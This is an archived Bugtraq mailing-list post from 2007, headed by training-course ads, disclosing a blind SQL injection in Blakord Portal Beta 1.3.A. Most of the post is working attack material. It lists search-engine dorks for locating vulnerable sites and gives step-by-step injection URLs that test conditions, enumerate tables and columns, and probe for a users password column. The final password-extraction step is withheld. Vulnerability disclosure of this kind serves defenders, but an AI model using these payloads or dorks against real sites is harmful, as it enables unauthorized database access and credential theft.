Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

from [sys-project] Network Security [Permanent Link]
Subject: Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection
Date: 26 Dec 2007 22:32:01 -0000 
Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection.

[+] Info:

[~] Software: Blakord Portal
[~] HomePage: http://www.cdv3k.com
[~] Exploit: Blind Sql Injection [High]
[~] Where: All Modules
[~] Bug Found By: JosS / Jose Luis Góngora Fernández
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by Blakord Portal"
[~] Dork2: "Powered by Blakord Portal"
[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table: 

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) 
FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * 
from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) 
FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * 
from users)
[~] If you don't see any error, it is tha table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) 
FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) 
FROM users) = 6
[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT 
Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT 
Count(U_PASSWORD) FROM users) >= 0
[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8
[~] Example: Priv8
[~] Priv8 , xD.
                                                [+] [The End]
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection, sys-project <=
Previous by Date:  RE: Cryptome: NSA has real-time access to Hushmail servers, M. Burnett
Next by Date:  XZero Community Classifieds <= v4.95.11 LFI & SQL Injection, office
Previous by Thread:  Bid 24744 ?, balrog
Next by Thread:  XZero Community Classifieds <= v4.95.11 LFI & SQL Injection, office
Indexes:  [Date] [Thread] [Top] [All Lists]